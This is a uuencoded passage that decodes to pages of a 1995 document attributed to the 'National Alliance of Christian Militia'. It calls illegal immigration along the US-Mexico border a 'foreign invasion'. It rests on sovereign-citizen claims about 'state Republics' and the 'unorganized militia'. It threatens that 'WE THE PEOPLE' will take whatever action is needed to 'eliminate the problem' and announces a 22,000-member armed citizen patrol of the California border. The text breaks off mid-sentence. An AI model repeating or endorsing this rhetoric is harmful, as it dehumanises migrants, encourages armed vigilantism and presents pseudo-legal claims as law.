M4R<N#0H-"B`@("`@("`@("`@("`@("`@5V4@87)E(&)Y(&YO(&UE86YS('!E
M<F9E8W0@87,@82!N871I;VX[('=E(&AA=F4@<')O8FQE;7,@:G5S="!A<R!A
M;GD@;W1H97(-"B`@("`@("`@("`@("`@("`@;F%T:6]N+B`@0G5T+"!C=7(@
M<WES=&5M(&]F(&=O=F5R;FUE;G0@:7,@9&5S:6=N960@=&\@87!P;'D@=&AE
M("!W:6QL("!O9B`@=&AE#0H@("`@("`@("`@("`@("`@('!E;W!L92!T;R!T
M:&4@8W)E871I;VX@;V8@<V]L=71I;VYS(&9O<B!T:&4@;6%N>2!P<F]B;&5M
M<R!T:&%T('=E(&%R90T*("`@("`@("`@("`@("`@("!C;VYF<F]N=&5D('=I
M=&@N#0H-"B`@("`@("`@("`@("`@("`@270@<V5E;7,@=&AO=6=H+"!T:&%T
M(&]V97(@=&AE<V4@<&%S="!M86YY("!Y96%R<RP@('=E+"`@87,@(&$@(&YA
M=&EO;BP@(&AA=F4-"B`@("`@("`@("`@("`@("`@='5R;F5D(&%W87D@9G)O
M;2!M86YY(&]F('1H92!P<FEN8VEP;&5S("!O;B`@=VAI8V@@('1H92`@56YI
M;VX@('=A<R`@9F]U;F1E9"X-"@T*("`@("`@("`@("`@("`@("!4:&4@<&5O
M<&QE('=E(&AA=F4@<&QA8V5D(&EN('!O<VET:6]N<R!R97!R97-E;G1I;F<@
M=7,@*%=%(%1(12!014]03$4I(&EN#0H@("`@("`@("`@("`@("`@('1H:7,@
M4F5P=6)L:6-A;B!S>7-T96T@(&]F("!G;W9E<FYM96YT+"`@:&%V92`@96ET
M:&5R("!B965N("!S:61E+71R86-K960@(&EN#0H@("`@("`@("`@("`@("`@
M('1H96ER(&5F9F]R=',@=&\@8V]N9G)O;G0@=&AE<V4@<')O8FQE;7,@86YD
M("!I;7!L96UE;G0@('-O;'5T:6]N<RP@(&]R("!T:&5Y#0H@("`@("`@("`@
M("`@("`@(&AA=F4@8V]M92!T;R!A('!O:6YT('=H97)E('1H97D@:G5S="!D
M;R!N;W0@8V%R92!T;R!F:6YD("!T:&4@('-O;'5T:6]N<R`@86YD#0H@("`@
M("`@("`@("`@("`@(&EM<&QE;65N="`@("`@=&AE;2X-"@T*("`@("`@("`@
M("`@("`@("!!="!T:&4@96YD(&]F(&QA<W0@>65A<BP@=&AE($=O=F5R;FUE
M;G0@06-C;W5N=&EN9R`@3V9F:6-E("`H1T%/*2P@('1E<W1I9FEE9`T*("`@
M("`@("`@("`@("`@("!T;R!T:&4@2&]U<V4@<W5B8V]M;6ET=&5E+"!O;B`@
M1&5C96UB97(@(#(Y+"`@:6X@(&$@(')E<&]R="`@:7-S=65D("!B>2`@=&AA
M=`T*("`@("`@("`@("`@("`@("!O9F9I8V4L('1H870@26QL96=A;"!);6UI
M9W)A=&EO;B!A;F0@5')A9F9I8VMI;F<@:6X@26QL96=A;"!$<G5G<R!A<F4@
M='=O#0H@("`@("`@("`@("`@("`@(&]F('1H92!M;W-T('-E<FEO=7,@=&AR
M96%T<R!T;R!C=7(@;F%T:6]N+@T*#0H,("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@1G)O;3H@
M1&5A;B!#;VUP=&]N("`@("`@("`@("`@("`@("`@("`@("`@("`@("`Y+S(Y
M+SDU("`Q-CHP-3HQ,B`@4&%G92`T(&]F(#$R#0I.051)3TY!3"!!3$Q)04Y#
M12!/1B!#2%))4U1)04X@34E,251)00T*#0H-"@T*#0H-"@T*#0H-"B`@("`@
M("`@("`@("`@("`@(%1H:7,@<F5P;W)T('-T871E<R!S<&5C:69I8V%L;'D@
M=&AA="!T:&4@;6%J;W(@<&]R=&EO;B!O9B!T:&4@=&AR96%T(&]F#0H@("`@
M("`@("`@("`@("`@("!T:&5S92`@='=O("!P<F]B;&5M<R`@:7,@(&9O8W5S
M960@(&%L;VYG("!T:&4@(%53+TU%6$E#3R`@<V]U=&AW97-T97)N("`@8F]R
M9&5R+@T*#0H@("`@("`@("`@("`@("`@("`@("H@07,@;V8@,3DY-"P@24Y3
M(&5S=&EM871E9"!A;&UO<W0@(#0@($UI;&QI;VX@($EL;&5G86P@($EM;6EG
M<F%N=',@(&%S("!B96EN9PT*("`@("`@("`@("`@("`@("`@("`@('=I=&AI
M;B`@=&AE<V4@(%5N:71E9"`@4W1A=&5S+B`@2&%L9B`@96YT97)E9"`@24Q,
M14=!3$Q9+"`@86YD("!T:&4@(&]T:&5R#0H@("`@("`@("`@("`@("`@("`@
M("`@:&%L9B!E;G1E<F5D(&%S('9I<VET;W)S+"!B=70L(&1I9"!N;W0@;&5A
M=F4N#0H-"B`@("`@("`@("`@("`@("`@("`@*B!);B`Q.3DR+"!O=F5R(&AA
M;&8@;V8@86QL(&%P<')E:&5N<VEO;G,@;VX@=&AE('-O=71H=V5S=&5R;B!5
M4R]-15A)0T\-"B`@("`@("`@("`@("`@("`@("`@("!B;W)D97(@;V-C=7)R
M960@:6X@='=O("!A<F5A<R`@,3,@(&UI;&5S("!W:71H:6X@('1H92`@4V%N
M("!$:65G;R`@<V5C=&]R+`T*("`@("`@("`@("`@("`@("`@("`@(&%N9"`U
M(&UI;&5S('=I=&AI;B!T:&4@16P@4&%S;R!S96-T;W(N("!4:&4@($5L("!0
M87-O("!S96-T;W(@(&-H:65F("!S87ES#0H@("`@("`@("`@("`@("`@("`@
M("`@=&AE<F4@87)E(&%S(&UA;GD@87,@(#$@(#`L,#`P("!);&QE9V%L("!)
M;6UI9W)A;G1S("!C<F]S<VEN9R`@:6YT;R`@=&AE<V4-"B`@("`@("`@("`@
M("`@("`@("`@("!5;FET960@4W1A=&5S(&5V97)Y(&YI9VAT(&%S("!W92`@
M<VQE97`N("!4:&4@(%-A;B`@1&EE9V\@('-E8W1O<B`@:&%S("!B965N#0H@
M("`@("`@("`@("`@("`@("`@("`@97-T:6UA=&5D(&%S(&AI9V@@87,@-BPP
M,#`N#0H-"B`@("`@("`@("`@("`@("`@("`@*B!";W)D97(@4&%T<F]L(&%G
M96YT<RP@=V]R:VEN9R!A<R!H87)D(&%S('1H97D@8V%N+"!M86YA9V4@=&\@
M87!P<F5H96YD#0H@("`@("`@("`@("`@("`@("`@("`@,2!O=70@;V8@."!O
M9B!T:&5S92!P96]P;&4N("!!;F0@(&EN("`Q.3DS+"`@=&AE<V4@('1W;R`@
M<V5C=&]R<R`@86-C;W5N=&5D#0H@("`@("`@("`@("`@("`@("`@("`@9F]R
M('1W;R`@=&AI<F1S("!O9B`@86QL("!A<'!R96AE;G-I;VYS("!A;&]N9R`@
M=&AE("!S;W5T:'=E<W1E<FX@(%53+TU%6$E#3PT*("`@("`@("`@("`@("`@
M("`@("`@(&)O<F1E<BX-"@T*("`@("`@("`@("`@("`@("`@4V%N($1I96=O
M+"!#02!A;F0@16P@4&%S;RP@5%@@:&%V92!B965N('1H92!H87)D97-T(&AI
M="!B>2!T:&5S92!C<F]S<VEN9W,N#0H@("`@("`@("`@("`@("`@("!"=70L
M(&%S("!L87<@(&5N9F]R8V5M96YT("!A;F0@($)O<F1E<B`@4&%T<F]L("!A
M9V5N=',@(&-O;F-E;G1R871E("!O;B`@=&AE<V4-"B`@("`@("`@("`@("`@
M("`@('-P96-I9FEC('1A<F=E="!A<F5A<RP@=&AE(&EL;&5G86P@8W)O<W-I
M;F=S(&)E9VEN("!T;R`@;6]V92`@=&\@(&%R96%S("!W:&EC:`T*("`@("`@
M("`@("`@("`@("`@87)E(&QE<W,@<')O=&5C=&5D(&]R('1A<F=E=&5D+@T*
M#0H@("`@("`@("`@("`@("`@("!.;W<L('-O;64@;V8@>6]U(&UA>2!T:&EN
M:R!T:&ES('-O=6YD<R!R96QA=&EV96QY(&AA<FUL97-S+B`@2&]W979E<BP@
M=&AE<F4-"B`@("`@("`@("`@("`@("`@(&ES("!A("!M=6-H("!B:6=G97(@
M(&%N9"`@;75C:"`@;6]R92`@9&%N9V5R;W5S("!P<F]B;&5M("!H:61D96X@
M('=I=&AI;B`@=&AI<PT*("`@("`@("`@("`@("`@("`@<V5E;6EN9VQY)VAA
M<FUL97-S)R!P<F]B;&5M+@T*#0H@("`@("`@("`@("`@("`@("!!8V-O<F1I
M;F<@=&\@=&AE($=!3R!R97!O<G0L(&%S("!M=6-H("!A<R`@-S`E("!O9B`@
M=&AE("!C;V-A:6YE("!E;G1E<FEN9R`@=&AI<PT*("`@("`@("`@("`@("`@
M("`@8V]U;G1R>2`H86YD('!O:7-O;FEN9R!C=7(@(&-H:6QD<F5N*2`@(G=A
M;&MS(B`@86-R;W-S("!T:&%T("!S;W5T:&5R;B`@8F]R9&5R#0H@("`@("`@
M("`@("`@("`@("!B971W965N($UE>&EC;R!A;F0@=&AE(%5N:71E9"`@4W1A
M=&5S("!E=F5R>2`@<VEN9VQE("!N:6=H="`@=VAI;&4@('=E("!S;&5E<"X-
M"B`@("`@("`@("`@("`@("`@(#(S)2!O9B!T:&4@2&5R;VEN(&5N=&5R:6YG
M("!T:&5S92`@56YI=&5D("!3=&%T97,@(&]R:6=I;F%T97,@(&EN("!-97AI
M8V\@(&%N9`T*("`@("`@("`@("`@("`@("`@+BYW86QK<R(@86-R;W-S('1H
M870@<V%M92!B;W)D97)S(&%L;VYG('=I=&@@;6EL;&EO;G,@;V8@<&]U;F1S
M(&]F#0H@("`@("`@("`@("`@("`@("!-87)I:G5A;F$N#0H-"B`@("`@("`@
M("`@("`@("`@(%1H:7,@8V]U;G1R>2!I<R!B96EN9R!I;G9A9&5D(&)Y(&$@
M9F]R96EG;B!F;V4L(&%N9"!W:71H;W5T("!F:7)I;F<@(&$@('-I;F=L90T*
M("`@("`@("`@("`@("`@("`@<VAO="`H=V5L;"P@86-T=6%L;'D@=&AE<F4@
M87)E('%U:71E(&$@9F5W('-H;W1S(&)E:6YG("!F:7)E9"DL("!T:&]U<V%N
M9',@(&]F#0H@("`@("`@("`@("`@("`@("!C=7(@<&5O<&QE(&%R92!D>6EN
M9R!I;B!T:&4@<W1R965T<R!A<R!A(')E<W5L="!O9B!T:&ES('-E96UI;F=L
M>0T*("`@("`@("`@("`@("`@("`@)VAA<FUL97-S)R!P<F]B;&5M+@T*#0H@
M("`@("`@("`@("`@("`@("!4:&4@9F%L;&]W:6YG(&ES(&$@<75O=&4@9G)O
M;2!O;F4@2F]R9V4@0V%S=&%I,V5D82`@*'=R:71I;F<@(&EN("!T:&4@($IU
M;'DG.34-"B`@("`@("`@("`@("`@("`@($%T;&%N=&EC($UO;G1H;'D@<F5G
M87)D:6YG('1H92!-97AI8V%N($5C;VYO;6EC(&-O;&QA<'-E("AT:&4@<&5S
M;PT*("`@("`@("`@("`@("`@("`@9&5V86QU871I;VXI(&%N9"!T:&4@<F5S
M=6QT<R!O9B!.049402!A;F0@;W1H97(@:6YF;'5E;F-E<RXN+@T*#0H@("`@
M("`@("`@("`@("`@("`@("`@(D1U<FEN9R!T:&4@3D%&5$$@9&5B871E(&%N
M9"!A="!T:&4@(&AE:6=H="`@;V8@(&AI<R`@8W)E9&EB:6QI='D@(&EN("!T
M:&4-"B`@("`@("`@("`@("`@("`@("`@("!5;FET960@4W1A=&5S+"!#87)L
M;W,@4V%L:6YA<R!A<F=U960@=&AA="!F86EL=7)E("!T;R`@<F%T:69Y("!T
M:&4@('1R96%T>0T*("`@("`@("`@("`@("`@("`@("`@('=O=6QD(&)R:6YG
M(&%B;W5T(&%N(&5C;VYO;6EC("!C;VQL87!S92`@:6X@($UE>&EC;RP@('=H
M:6-H("!I;B`@='5R;B`@=V]U;&0-"B`@("`@("`@("`@("`@("`@("`@("!B
M<FEN9R!A8F]U="`@82`@=V%V92`@;V8@('5N9&]C=6UE;G1E9"`@:6UM:6=R
M871I;VX@('1O("!T:&4@(&YO<G1H+B`@(E1H90T*("`@("`@("`@("`@("`@
M("`@("`@(&5C;VYO;6EC(&-O;&QA<'-E(&-A;64@(&%B;W5T("!A;GEW87DL
M("!B=70@('1H92`@=V%V92`@;&]O:W,@(&UO<F4@(&QI:V4@(&$-"B`@("`@
M("`@("`@("`@("`@("`@("!S=&5A9&EL>2!R:7-I;F<@=&ED92X@(%=E<F4@
M=&AE($-L:6YT;VX@861M:6YI<W1R871I;VX@:6X@:71S#0H@("`@("`@("`@
M("`@("`@("`@("`@;V)S97-S:6]N('=I=&@@<F4M96QE8W1I;VX@<&]L:71I
M8W,@=&\@=')Y('1O('-T96T@=&AA="!T:61E+"!I="!W;W5L9`T*("`@("`@
M("`@("`@("`@("`@("`@('1H<F5A=&5N('1H92!O;FQY('1R=64@9&5T97)R
M96YT('1O('1H92!P<F]V97)B:6%L('=A=F4Z($UE>&EC86X-"@T*#"`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@1G)O;3H@1&5A;B!#;VUP=&]N("`@("`@("`@("`@("`@("`@("`@
M("`@("`@.2\R.2\Y-2`@,38Z,#4Z-3(@(%!A9V4@-2!O9B`Q,@T*3D%424].
M04P@04Q,24%.0T4@3T8@0TA225-424%.($U)3$E424$-"@T*#0H-"@T*#0H-
M"@T*("`@("`@("`@("`@("`@("`@("!S=&%B:6QI='DN#0H-"B`@("`@("`@
M("`@("`@("`@("`@(D%N>2!A='1E;7!T('1O(&-L86UP(&1O=VX@;VX@:6UM
M:6=R871I;VX@9G)O;2!T:&4@<V]U=&@@+2T@8GD@<V5A;&EN9PT*("`@("`@
M("`@("`@("`@("`@("!T:&4@8F]R9&5R(&UI;&ET87)I;'DL(&)Y(&9O<F-I
M;F<@365X:6-O('1O(&1E=&5R(&ET<R!C:71I>F5N<R!F<F]M#0H@("`@("`@
M("`@("`@("`@("`@(&5M:6=R871I;F<L(&]R('1H<F]U9V@@<V]M92!F961E
M<F%L('9E<G-I;VX@;V8@4')O<&]S:71I;VX@,3@W("TM('=I;&P-"B`@("`@
M("`@("`@("`@("`@("`@;6%K92!S;V-I86P@<&5A8V4@:6X@=&AE(&)A<G)I
M;W,@86YD('!U96)L;W,@;V8@365X:6-O('5N=&5N86)L92XB#0H-"B`@("`@
M("`@("`@("`@("`@3&%D:65S(&%N9"!'96YT;&5M96XL('=H870@0V%S=&%N
M961A(&ES('-A>6EN9R!H97)E(&ES('=E(&AA=F4@='=O(&-H;VEC97,N#0H@
M("`@("`@("`@("`@("`@($5I=&AE<B!W92!A8V-E<'0@;&%R9V4@<V-A;&4G
M:6QL96=A;"!I;6UI9W)A=&EO;B<@:6X@;W)D97(@=&\@86QL;W<@365X:6-O
M#0H@("`@("`@("`@("`@("`@('1O(&%V;VED(&-H86]S(&EN('1H96ER(&-O
M=6YT<GDL(&]R('=E(&-A;B!I;F-R96%S92!C=7(@969F;W)T<R!T;R!A<G)E
M<W0-"B`@("`@("`@("`@("`@("`@=&AE('1I9&4@86YD(&9A8V4@82!F=6QL
M('-C86QE(&EN=F%S:6]N(&%S(&$@<F5S=6QT;"!.96ET:&5R(&]F('1H97-E
M#0H@("`@("`@("`@("`@("`@('-C96YA<FEO<R!I<R!A8V-E<'1A8FQE+@T*
M#0H@("`@("`@("`@("`@("`@(%5N9&5R('1H92!#;VYS=&ET=71I;VX@*'1H
M92!F<F%M97=O<FL@9F]R('1H:7,@56YI;VXI+"!T:&4@4')E<VED96YT(&%S
M#0H@("`@("`@("`@("`@("`@($-O;6UA;F1E<B!I;B!#:&EE9BP@:6X@8V]N
M:G5N8W1I;VX@=VET:"!T:&4@3&5G:7-L871I=F4@86YD('1H92!*=61I8VEA
M;`T*("`@("`@("`@("`@("`@("!B<F%N8VAE<R!O9B!G;W9E<FYM96YT+"!H
M87,@82!R97-P;VYS:6)I;&ET>2!T;R!D969E;F0@=&AE(%-O=F5R96EG;@T*
M("`@("`@("`@("`@("`@("!";W)D97)S(&]F('1H92!5;FEO;B!F<F]M(&EN
M=F%S:6]N(&)Y(&9O<F5I9VX@9F]R8V5S+@T*#0H@("`@("`@("`@("`@("`@
M($9O<B!W:&%T979E<B!R96%S;VXL(&)E(&ET(&QA8VL@;V8@8V]M;6ET;65N
M="!O<B!J=7-T('!L86EN(&-A<F5L97-S;F5S<RP-"B`@("`@("`@("`@("`@
M("`@=&AE(&9E9&5R86P@9V]V97)N;65N="!H87,@;F5G;&5C=&5D('1O('!E
M<F9O<FT@:71S(&1U='D@=&\@<')O=&5C="!T:&4-"B`@("`@("`@("`@("`@
M("`@4V]V97)E:6=N($-I=&EZ96YS(&]F('1H97-E(%5N:71E9"!3=&%T97,@
M9G)O;2!S=6-H(&%N(&EN=F%S:6]N+@T*#0H@("`@("`@("`@("`@("`@(%=E
M('-T:6QL(&AA=F4@=&AE('=O<FQD)W,@9W)E871E<W0@87)M>2X@(%=E(&AA
M=F4@=&AE(&)E<W0@=')A:6YE9"!M96X@86YD#0H@("`@("`@("`@("`@("`@
M('=O;65N(&%N9"!T:&4@8F5S="!E<75I<&UE;G0@=&AA="!A($9R964L(%1A
M>'!A>6EN9R!#;W5N=')Y(&-A;B!B=7DN("!790T*("`@("`@("`@("`@("`@
M("!H879E('1H92!W:6QL(&]F(&-U<B!3;VQD:65R<R!I;B!!<FUS('1O(&1E
M9F5N9"!C=7(@8F]R9&5R<R!F<F]M(&EN=F%S:6]N+@T*("`@("`@("`@("`@
M("`@("!"=70L(&ET('-E96US(&%S('1H;W5G:"!T:&4@=VEL;"!O9B!C=7(@
M96IE8W1E9"!O9F9I8VEA;',@:7,@:G5S="!N;W0@<75I=&4-"B`@("`@("`@
M("`@("`@("`@87,@<W1R;VYG+@T*#0H@("`@("`@("`@("`@("`@($]U<B!3
M;VQD:65R<R!I;B!!<FUS('!U="!T:&5I<B!L:79E<R!O;B!T:&4@;&EN92!A
M;F0@9&EE9"!B96-A=7-E('1H97D@=V5R90T*("`@("`@("`@("`@("`@("!C
M86QL960@=&\@9&5F96YD(&%N;W1H97(@8V]U;G1R>2=S(&)O<F1E<G,L(%9I
M970@3F%M+B`@5&AE>2!B96QI979E9"!T:&5Y#0H@("`@("`@("`@("`@("`@
M('=E<F4@9&5F96YD:6YG(&9R965D;VUS(%1H97D@=V5R92!D969E;F1I;F<@
M9G)E961O;7,-"@T*("`@("`@("`@("`@("`@("!792!L;W-T('1H870@=V%R
M+B`@5V4@=VEL;"!N;W0@;&]S92!T:&ES('=A<FP@36%K92!N;R!M:7-T86ME
M(&%B;W5T(&ET+BXN#0H@("`@("`@("`@("`@("`@('1H92!0<F5S:61E;G0@
M86YD('1H92!#;VYG<F5S<R!B;W1H(&9O<FUA;&QY(&1E8VQA<F5D('=A<B!O
M;B!D<G5G<R!B86-K(&EN#0H@("`@("`@("`@("`@("`@('1H92!M:60@,3DX
M,"=S+@T*#0H@("`@("`@("`@("`@("`@($EF('1H92!F961E<F%L(&=O=F5R
M;FUE;G0@9&]E<R!N;W0@=&%K92!D96-I<VEV92!A8W1I;VXL(&9O<B!W:&%T
M979E<@T*("`@("`@("`@("`@("`@("!R96%S;VXL('1H96X@=&AE(&1E9F5N
M<V4@86=A:6YS="!I;G9A<VEO;B!F86QL<R!T;R!T:&4@1V]V97)N;W)S(&]F
M(&5A8V@@;V8-"B`@("`@("`@("`@("`@("`@=&AE('-E=F5R86P@<W1A=&4@
M4F5P=6)L:6-S+@T*#0H@("`@("`@("`@("`@("`@(%1H92!';W9E<FYO<G,@
M;V8@=&AE('-T871E(%)E<'5B;&EC<R!O9B!#86QI9F]R;FEA+"!!<FEZ;VYA
M+"!.97<@365X:6-O+`T*("`@("`@("`@("`@("`@("!A;F0@5&5X87,@:&%V
M92!T:&4@0V]N<W1I='5T:6]N86P@86YD($UO<F%L(')E<W!O;G-I8FEL:71Y
M+"!A<R!W96QL(&%S('1H90T*("`@("`@("`@("`@("`@("!#;VYS=&ET=71I
M;VYA;"!A=71H;W)I='DL('1O(&-A;&P@9F]R=&@@=&AE($YA=&EO;F%L($=U
M87)D('1O(&1E9F5N9`T*("`@("`@("`@("`@("`@("!A9V%I;G-T(&%N(&EN
M=F%S:6]N(&]F(&YO="!O;FQY('1H92!5;FEO;B!A<R!A('=H;VQE+"!B=70@
M=&AE('-T871E<PT*("`@("`@("`@("`@("`@("!I;F1I=FED=6%L;'DN("!!
M;F0@=&AE>2!H879E('1H92!D=71Y('1O('!R;W1E8W0@=&AE(%-O=F5R96EG
M;B!#:71I>F5N<R!O9@T*("`@("`@("`@("`@("`@("!E86-H(&]F('1H96ER
M(')E<W!E8W1I=F4@<W1A=&5S+"!A;F0@=&AE($-I=&EZ96YS(&]F('1H92!5
M;FEO;B!A<R!A('=H;VQE+@T*#0H@("`@("`@("`@("`@("`@($DG;2!S=7)E
M('1H870@>6]U+"!A<R!W96QL(&%S(#$L(&AA=F4@;F\@:61E82!W:'D@8W5R
M(&5J96-T960@96UP;&]Y965S#0H@("`@("`@("`@("`@("`@(&AA=F4@;F]T
M('1A:V5N(&%C=&EO;G,@=&AR;W5G:"!A=71H;W)I='D@869F;W)D960@=&AE
M;2!B>2!T:&4@0V]N<W1I='5T:6]N#0H@("`@("`@("`@("`@("`@(&%N9"!T
M:&4@=VEL;"!O9B!T:&4@4V]V97)E:6=N($-I=&EZ96YS+B`@5&AE('!E;W!L
M92!O9B!T:&4@<W1A=&4@4F5P=6)L:6,-"B`@("`@("`@("`@("`@("`@;V8@
M0V%L:69O<FYI82!H879E(&)E9V=E9"!A;F0@<&QE861E9"P@=V4G=F4@8W)I
M960@86YD(&1I960L(&%N9"!W92!H879E#0H@("`@("`@("`@("`@("`@(%9O
M=&5D(2!!;F0@<W1I;&P@=&AE('!R;V)L96T@;6%G;FEF:65S+@T*#0H,("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("!&<F]M.B!$96%N($-O;7!T;VX@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@(#DO,CDO.34@(#$V.C`V.C,R("!086=E(#8@;V8@,3(-
M"DY!5$E/3D%,($%,3$E!3D-%($]&($-(4DE35$E!3B!-24Q)5$E!#0H-"@T*
M#0H-"@T*#0H-"B`@("`@("`@("`@("`@("`@5V4@=V]U;&0@<')E9F5R('1O
M(&)E;&EE=F4@=&AE(&=O=F5R;FUE;G0@:&%S(&=O;V0@:6YT96YT:6]N<RX@
M(%=E('=O=6QD#0H@("`@("`@("`@("`@("`@('!R969E<B!T;R!B96QI979E
M('1H97D@87)E(&1O:6YG('1H92!B97-T('1H97D@8V%N+B`@06YD("!I="`@
M:7,@(&)E8V%U<V4@(&]F#0H@("`@("`@("`@("`@("`@('1H870@<')E9F5R
M96YC92!O9B!B96QI968@=&AA="!W92!I;G1E;F0@=&\@;V9F97(@8W5R(&%S
M<VES=&%N8V4N#0H-"B`@("`@("`@("`@("`@("`@5&AE('!E;W!L92!O9B!T
M:&5S92!5;FET960@4W1A=&5S+"!A;F0@=&AE(%-O=F5R96EG;B!#:71I>F5N
M<R!O9B!T:&4@<W1A=&4-"B`@("`@("`@("`@("`@("`@4F5P=6)L:6-S(&]F
M($-A;&EF;W)N:6$L("!!<FEZ;VYA+"`@3F5W("!-97AI8V\L("!A;F0@(%1E
M>&%S("!B96QI979E("!T:&4-"B`@("`@("`@("`@("`@("`@<')O=&5C=&EO
M;B!O9B!T:&ES(&-O=6YT<GD@+2T@=&AI<R!5;FEO;B!O9B!T:&4@('-E=F5R
M86P@(%-O=F5R96EG;B`@4W1A=&4-"B`@("`@("`@("`@("`@("`@4F5P=6)L
M:6-S("TM(&ES(&EM<&]R=&%N="!E;F]U9V@@=&AE>2!A<F4@=VEL;&EN9R!T
M;R!S=&%N9"X-"@T*("`@("`@("`@("`@("`@("!792!A<F4@3D]4(')A:7-I
M;F<@82`B<')I=F%T92!A<FUY(BX@(%5N9&5R('1H92!":6QL(&]F(%)I9VAT
M<RP@06UE;F1M96YT(#(-"B`@("`@("`@("`@("`@("`@;V8@=&AE($-O;G-T
M:71U=&EO;BP@5&ET;&4@,2`P(&]F('1H92!5;FET960@4W1A=&5S("!#;V1E
M("!A;F0@('5N9&5R("!T:&4-"B`@("`@("`@("`@("`@("`@0V%L:69O<FYI
M82!-:6QI=&%R>2!A;F0@5F5T97)A;G,@0V]D92P@("XN+F5V97)Y("!A8FQE
M+6)O9&EE9"`@;6%L92`@*'1H:7,-"B`@("`@("`@("`@("`@("`@9&]E<VXG
M="!S87D@3D\@0DQ!0TM3+"!.3R!(25-004Y)0U,L($Y/($I%5U,N+BX@:70@
M<V%Y<RD@979E<GD@86)L92UB;V1I960-"B`@("`@("`@("`@("`@("`@;6%L
M92P@8F5T=V5E;B!T:&4@86=E<R!O9B`Q-R`H;W(@,3@I(&%N9"`T-2P@=VET
M:"!C97)T86EN(&5X8V5P=&EO;G,L(&%R90T*("`@("`@("`@("`@("`@("!D
M969I;F5D(&%S('1H92`B54Y/4D=!3DE:140@34E,251)02(N#0H-"B`@("`@
M("`@("`@("`@("`@5&AE(")M:6QI=&EA(B!Y;W4@<V5E('!R97-E;G1E9"!O
M;B!T96QE=FES:6]N(&%N9"!I;B!N97=S<')I;G0L(&ES(&$-"B`@("`@("`@
M("`@("`@("`@;6ES<F5P<F5S96YT871I;VX@;V8@9F%C=',@8GD@<V5G;65N
M=',@;V8@=&AE(&UE9&EA+"!F;W(@=VAA=&5V97(@<F5A<V]N+@T*("`@("`@
M("`@("`@("`@("!,;V]K(&%R;W5N9"!T:&4@<F]O;2XN+B!T:&ES(&ES('1H
M92!M:6QI=&EA(&%S("!D969I;F5D("!B>2`@;&%W+B`@5T4@(%1(10T*("`@
M("`@("`@("`@("`@("!014]03$5)#0H-"B`@("`@("`@("`@("`@("`@5T4@
M5$A%(%!%3U!,12!W:6QL(&YO(&QO;F=E<B!T;VQE<F%T92!C=7(@8G)O=&AE
M<G,@86YD('-I<W1E<G,L(&UO=&AE<G,@86YD#0H@("`@("`@("`@("`@("`@
M(&9A=&AE<G,L('-O;G,@86YD(&1A=6=H=&5R<RP@;W(@8W5R("!F<FEE;F1S
M("!A;F0@(&9E;&QO=R`@8VET:7IE;G,@(&)E:6YG#0H@("`@("`@("`@("`@
M("`@(&1E<W1R;WEE9"!B>2!A(&9O<F5I9VX@:6YV861E<BX-"@T*("`@("`@
M("`@("`@("`@("!)9B!/55(@14U03$]91453("AF961E<F%L(&%N9"!S=&%T
M92!G;W9E<FYM96YT('!E<G-O;FYE;"D@=VEL;"!N;W0@8V%R<GD-"B`@("`@
M("`@("`@("`@("`@;W5T('1H92!E>'!L:6-I="!I;G-T<G5C=&EO;G,@;V8@
M=&AE:7(@14U03$]915)3("TM(%=%(%1(12!014]03$4@+2T@=&AE#0H@("`@
M("`@("`@("`@("`@($5-4$Q/64524R`H8F5I;F<@=&AE("!P96]P;&4I("`M
M+2`@=VEL;"`@=&%K92`@=&AE("!A8W1I;VYS("!N96-E<W-A<GD@('1O#0H@
M("`@("`@("`@("`@("`@(&5L:6UI;F%T92!T:&4@<')O8FQE;2X-"@T*("`@
M("`@("`@("`@("`@("!712!42$4@4$5/4$Q%+"!T:&4@4V]V97)E:6=N($-I
M=&EZ96YS(&]F('1H92!S=&%T92!297!U8FQI8R!O9B!#86QI9F]R;FEA#0H@
M("`@("`@("`@("`@("`@(&%R92!P<F5P87)E9"!T;R!P;&%C92`R,BPP,#`@
M8VET:7IE;B!M:6QI=&EA(&UE;6)E<G,@*&%S(&1E9FEN960@:6X@,2!/55-#
M#0H@("`@("`@("`@("`@("`@(&%N9"!T:&4@0V%L:69O<FYI82!-:6QI=&%R
M>2!A;F0@5F5T97)A;G,@0V]D92D@;W(@87,@;6%N>2!M;W)E(&%S#0H@("`@
M("`@("`@("`@("`@(&YE8V5S<V%R>2P@86QO;F<@=&AE('-O=71H97)N(%-O
M=F5R96EG;B!";W)D97(@;V8@0V%L:69O<FYI82]-97AI8V\L('5N9&5R#0H@
M("`@("`@("`@("`@("`@('1H92!C;VYT<F]L(&]F('1H92!';W9E<FYO<BP@
M;&]C86P@0V]U;G1Y(%-H97)I9F9S+"!T:&4@(%53("!";W)D97(@(%!A=')O
M;"P-"B`@("`@("`@("`@("`@("`@;W(@=6YD97(@8W5R(&]W;B!A=71H;W)I
M='D@:68@;F5E9"!B92P@:6X@;W)D97(@=&\@<&5R9F5C="!A(&1E9F5N<V4-
M"B`@("`@("`@("`@("`@("`@86=A:6YS="!T:&ES(&9O<F5I9VX@:6YV87-I
M;VXN#0H-"B`@("`@("`@("`@("`@("`@5&AI<R`R,BPP,#`@;6%N(&-O;G1I
M;F=E;G0@:6YC;'5D97,@82!M86X@979E<GD@,34P(&9E970@86QO;F<@=&AE
M(&5N=&ER90T*("`@("`@("`@("`@("`@("!#86QI9F]R;FEA+TUE>&EC;R!B
M;W)D97(L('=I=&@@<F]T871I;VYS(&5V97)Y(#@@:&]U<G,L("!R97-U;'1I
M;F<@(&EN("`R-`T*("`@("`@("`@("`@("`@("!H;W5R(&-O=F5R86=E<R`S
M-C4@9&%Y<R!P97(@>65A<BX@($ET(&EN8VQU9&5S(&]N92!A9&1I=&EO;F%L
M(&UA;B!F;W(@979E<GD-"B`@("`@("`@("`@("`@("`@=&AR964@:6X@82!S
M=7!P;W)T(')O;&4N("!)9B!L86-K(&]F(&UA;G!O=V5R(&ES('1H92!S;VQU
M=&EO;B!T;R!T:&ES#0H@("`@("`@("`@("`@("`@('!R;V)L96T@+2T@5T4@
M5$A%(%!%3U!,12!W:6QL('!R;W9I9&4@=&AE(&UA;G!O=V5R+@T*#0H@("`@
M("`@("`@("`@("`@($-O;F-U<G)E;G1L>2P@=&AE('-T871E(%)E<'5B;&EC
